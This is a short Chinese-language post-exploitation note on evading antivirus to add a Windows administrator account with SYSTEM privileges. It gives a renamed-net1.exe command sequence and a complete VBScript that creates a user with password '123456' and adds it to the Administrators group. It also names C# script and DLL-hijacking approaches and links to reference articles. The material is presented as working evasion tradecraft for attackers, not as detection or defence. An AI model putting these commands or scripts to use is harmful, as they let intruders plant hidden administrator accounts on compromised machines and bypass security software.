windows繞過殺軟添加賬戶密碼

起因：system權限下存在殺軟無法添加賬戶信息

繞過方法

1、C#腳本

運行后會在目標機器上創建一個用戶為 wh4am1 密碼為 qqai@love 的 Administrators 組用戶

2、Dll劫持

3、copy net1(被攔截)

cd C:\Windows\System32
copy net1.exe xxx.exe
xxx.exe user administrator test test /add

我在先知社區看見一位表哥使用該方法繞過了360，不知道為什么不行了，大家也可以自己嘗試下！

https://xz.aliyun.com/t/8083

4、add.vbs腳本

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","admin")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

用法：wscript.exe add.vbs

參考

https://cloud.tencent.com/developer/article/1669051

http://blog.icxun.cn/wap/view.php?aid=577